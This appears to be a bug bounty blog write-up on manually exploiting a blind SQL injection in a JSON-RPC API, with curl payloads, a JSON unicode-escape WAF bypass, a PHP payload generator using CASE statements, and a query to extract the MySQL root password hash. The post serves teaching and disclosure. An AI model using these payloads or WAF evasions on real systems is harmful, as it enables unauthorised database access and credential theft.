Making a Blind SQL Injection a Little Less Blind

9 min readJul 28, 2018

Someone told me the other day that “no-one does SQL Injection by hand any more”. I want to tell you about a SQL Injection bug that I found and exploited manually.

Disclaimer: for the most part, I’m going to take you down the ‘happy path’ here. There were many more dead-ends, far more frustration, and much more head scratching in the discovery and exploitation of this bug than any of this would imply. I’d hate for all of that to get in the way of a good story though, so anyway…

I was looking at a JSON-RPC API on a target (a target with a bug bounty program; I’m a good boy, I am), when I spotted a telltale sign of a problem: a single quote in the parameter would throw an error:

tom@bash:~▶ cat payload.json 
"jsonrpc": "2.0",
"method": "getWidgets",
"params": ["2'"]
tom@bash:~▶ curl -s $APIURL -d @payload.json

But with the quote wrapped in a MySQL comment, there was no error:

tom@bash:~▶ cat payload.json 
"jsonrpc": "2.0",
"method": "getWidgets",
"params": ["2/*'*/"]
tom@bash:~▶ curl -s $APIURL -d @payload.json
// No errors; just results :)

(I’m redacting the method name here to avoid disclosing the name of the target).

After a little messing around trying to inject aUNION (and failing), and trying a few different characters, I eventually figured out my payload was probably being put inside an IN (...) clause. Strong evidence for that was that if I passed in just a 2, each of the assets in the returned data structure had a type_id of 2:

tom@bash:~▶ cat payload.json
"jsonrpc": "2.0",
"method": "getWidgets",
"params": ["2"]
tom@bash:~▶ curl -s $APIURL -d @payload.json | gron | grep type_id[5].assets[0].type_id = 2;[5].assets[1].type_id = 2;[5].assets[2].type_id = 2;

But if I passed in a comma-separated list of numbers, each of the assets had values fortype_id that were included in the list I provided:

tom@bash:~▶ cat payload.json 
"jsonrpc": "2.0",
"method": "getWidgets",
"params": ["1,2,3,4,5,6,7,8,9,10"]
tom@bash:~▶ curl -s $APIURL -d @payload.json | gron | grep type_id[0].assets[0].type_id = 10;[0].assets[1].type_id = 8;[0].assets[2].type_id = 9;[1].assets[0].type_id = 10;[1].assets[1].type_id = 8;[1].assets[2].type_id = 9;[2].assets[0].type_id = 8;[2].assets[1].type_id = 10;[3].assets[0].type_id = 8;[3].assets[1].type_id = 9;[3].assets[2].type_id = 10;[4].assets[0].type_id = 8;[4].assets[1].type_id = 9;[4].assets[2].type_id = 10;[5].assets[0].type_id = 10;[5].assets[1].type_id = 8;[5].assets[2].type_id = 9;[5].assets[3].type_id = 2;[5].assets[4].type_id = 2;[5].assets[5].type_id = 2;

That behaviour, and the relationship between widgets and assets, led me to believe that the query probably looked something like this:

FROM widgets w
LEFT JOIN assets a ON (
a.widget_id =
AND a.type_id IN ($IDS)
...more SQL...

I was pretty sure it was a LEFT JOIN because the same number of widgets were always being returned, only the number of assets attached to them would vary depending on the parameter; and I was fairly sure there was some more SQL after the JOIN (a LIMIT, ORDER BY, another JOIN, or something like that) and that’s what was preventing my earlier attempt at injecting a UNION statement from working.

So, no way to directly exfiltrate data then. This SQLi is as blind as a dodo (what? Dodos are dead, and dead things can’t see).

Binary Questions

One of the fairly common ways to leverage a blind SQL Injection is to ask yes/no questions using an IF(expression, true, false) statement, and that was my very first thought. I knew already that if I provided an ID of 2 there would be some assets attached to the widgets, and if I provided an ID of 1 there would be no assets. So — in theory at least — I could use a subquery as my payload and have it return 2 for true and 1 for false. If there’s assets in the response the answer would be ‘yes’, and if there aren’t any the answer would be ‘no’.

I decided I would test the theory by trying to figure out something simple: the hostname of the database server. The hostname on a MySQL server is stored in the hostname variable, and you can easily see it like this:

mysql> SELECT @@hostname;
| @@hostname |
| girru |
1 row in set (0.00 sec)

These examples are being run on a machine of mine, named after the Babylonian god of fire. I always think it’s a good idea to test whatever you can locally instead of blindly (hah) trying to figure things out on the actual target, with no real feedback or error messages.

Because I can only ask yes/no questions, to figure out the hostname I need to see if the first character is an a, if it’s a b, or c, and so on until I find the right character; then I can move on to the second character. You can do that by using the SUBSTRING() function:

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "a", 2, 1);
| IF(SUBSTRING(@@hostname, 1, 1) = "a", 2, 1) |
| 1 |
1 row in set (0.00 sec)

Remember: a 1 in the result means ‘no’, and a 2 means ‘yes’. So, nope: not an a.

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "b", 2, 1);
| IF(SUBSTRING(@@hostname, 1, 1) = "b", 2, 1) |
| 1 |
1 row in set (0.00 sec)

Not a b either… Cue the wavy time-travel lines…

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "g", 2, 1);
| IF (SUBSTRING(@@hostname, 1, 1) = "g", 2, 1) |
| 2 |
1 row in set (0.00 sec)

Ah! It’s a g! Now we can move on to the next character.

With my test query running fine locally, I could try it as a payload on the JSON-RPC API. Fingers crossed!

tom@bash:~▶ cat payload.json
"jsonrpc": "2.0",
"method": "getWidgets",
"params": [
"SELECT IF(SUBSTRING(@@hostname, 1, 1) = \"a\", 2, 1)"
tom@bash:~▶ curl -s $APIURL -d @payload.json
<TITLE>Access Denied</TITLE>
<H1>Access Denied</H1>

You don't have permission to access "<redacted>" on this server.<P>

Dammit, dammit, dammit. Those pesky WAFs are always getting in my way.

Thankfully, because the payload is JSON, I could easily obfuscate it to get around the WAF by using \uXXXX escape sequences. Crisis averted:

tom@bash:~▶ cat payload.json 
"jsonrpc": "2.0",
"method": "getWidgets",
"params": [
"\u0053ELECT \u0049F(\u0053UBSTRING(@@hostname, 1, 1) = \"a\", 2, 1)"
tom@bash:~▶ curl -s $APIURL -d @payload.json | gron | grep type_id
// No WAF error here; but no assets either!

No WAF error, but no assets either; so if everything’s working as intended the hostname doesn’t begin with an a. Time to try the next letter! And the next one… And the next one…

I worked my way through the alphabet until:

tom@bash:~▶ cat payload.json
"jsonrpc": "2.0",
"method": "getWidgets",
"params": [
"\u0053ELECT \u0049F(\u0053UBSTRING(@@hostname, 1, 1) = \"r\", 2, 1)"
tom@bash:~▶ curl -s $APIURL -d @payload.json | gron | grep type_id[5].assets[0].type_id = 2;[5].assets[1].type_id = 2;[5].assets[2].type_id = 2;

Results! The hostname starts with an r!

It was at this point I decided that rather than try and figure out the second character in the hostname, I’d write up my findings and report them. I figured I had a pretty good POC and that they’d surely reward me for being the hacking god that — in that moment — I knew myself to be.

Just in CASE

In my report I said something like “data exfiltration, whilst slow, could easily be scripted”. Which is true, but it would still be a real pain to actually get any useful data out of the thing, wouldn’t it? Asking all of those yes/no questions would surely show up on somebody’s monitoring dashboard somewhere if you actually tried to use it for anything other than the shortest of strings.

How can we make things a little faster? Maybe even a couple of orders of magnitude faster?! We need to go beyond binary questions, beyond trinary questions, and even beyond that!… OK, I made that sound a little more exciting that it really is: we can use a CASE statement.

A CASE statement lets you do something like this:

mysql> SELECT CASE SUBSTRING(@@hostname, 1, 1)
-> WHEN "a" THEN 1
-> WHEN "b" THEN 2
-> WHEN "c" THEN 3
-> WHEN "d" THEN 4
-> WHEN "e" THEN 5
-> WHEN "f" THEN 6
-> WHEN "g" THEN 7
-> ...
-> WHEN "z" THEN 26
-> END as result;
| result |
| 7 |
1 row in set (0.00 sec)

So, because the result of this query is 7, I know the first character in @@hostname is g :)

The slight problem here is that I couldn’t just neatly use the numbers 1 to 26 for each letter, because not all possible IDs had corresponding assets. I needed to find enough valid IDs to make this work.

I wrote a little PHP script to save me from typing out the numbers from 1 to 100 and tried passing in 1,2,3...99,100 as the parameter. I used a little bit of command line trickery to find a list of all the unique valid IDs:

tom@bash:~▶ cat genrange.php 
$payload = [
"jsonrpc" => "2.0",
"method" => "getWidgets",
"params" => [
implode(",", range(1, 100))
echo json_encode($payload);
tom@bash:~▶ curl --compressed -s $APIURL -d @<(php genrange.php) | gron | grep type_id | awk '{print $NF}' | sort -nu

In total I found 31 valid IDs, which isn’t nearly enough to cover even the ASCII character set, but it’s enough to cover all the lower-case letters and even a few numbers for good measure. It’s also a lot better than only being able to answer yes/no questions.

I knocked together another hacky PHP script to make generating my payload a little easier:

tom@bash:~▶ cat gensql.php 
// first argument to the script is the char to fetch
$char = $argv[1]?? 1;
// The payload
$sql = '
SELECT CASE SUBSTRING(@@hostname, '.$char.', 1)
WHEN "d" THEN 10
WHEN "z" THEN 35
WHEN "0" THEN 36
WHEN "1" THEN 37
WHEN "2" THEN 38
WHEN "3" THEN 39
WHEN "4" THEN 40
$wrapper = [
"jsonrpc" => "2.0",
"method" => "getWidgets",
"params" => [$sql]
$payload = json_encode($wrapper);// Add some obfuscation to defeat the WAF :)
echo str_replace(
["C", "S", "T", "W"],
["\u0043", "\u0053", "\u0054", "\u0057"],

(I probably could have generated all the WHEN "x" THEN y parts of the query with a loop but all I can say to that is: ¯\_(ツ)_/¯)

With my script in hand I could try and figure out the rest of that pesky hostname; using awk '{print $NF}' to print the last field (i.e. the type_id), and uniq to remove the duplicates.

First character:

tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 1) | gron | grep type_id | awk '{print $NF}' | uniq

Consulting my lookup table, that’s an r! Good, I knew that, so it looks like it’s working. More characters:

tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 2) | gron | grep type_id | awk '{print $NF}' | uniq
tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 3) | gron | grep type_id | awk '{print $NF}' | uniq
tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 4) | gron | grep type_id | awk '{print $NF}' | uniq

11, 10, and 2; that’s e, d, and a. Hmm,reda? Let’s keep going…

tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 5) | gron | grep type_id | awk '{print $NF}' | uniq
tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 6) | gron | grep type_id | awk '{print $NF}' | uniq
tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 7) | gron | grep type_id | awk '{print $NF}' | uniq
tom@bash:~▶ curl -s $APIURL -d @<(php gensql.php 8) | gron | grep type_id | awk '{print $NF}' | uniq

9, 29, 11, and 10… So that’s c, t, e, and d.

Oh hey: it’sredacted ;)

All joking (and redaction) aside, I actually was able to read the hostname at a rate of one character per request, or — and this is a bit of a guess — about 2 bits per second.

Upping The Impact?

Reading the hostname out of a variable isn’t really a big deal; I get that. So what else could you get? How about this (provided the database user in question has permission to read it):

SELECT u.authentication_string
FROM mysql.user u
WHERE u.User = "root"
), 1, 1)

42 requests or so later and you’ve got yourself a hash for offline brute-forcing. Much of the time of course, having the root MySQL password is pretty much useless because most sane people don’t allow direct access to their MySQL instances. It’s a neat trick though, huh?

In a ‘real’ attack my first port of call would be the information_schema, so I could learn more about the schema and what other juicy data could be extracted. And I might have done that, had I not found a non-blind SQL Injection bug in the very next method I looked at 🙄

This was a fun bug. I appreciate it’s nothing truly groundbreaking, but I don’t find SQLi bugs very often so I thought it warranted a write-up :)




Explainer, talker, coder, fixer, eater, not really a sheep.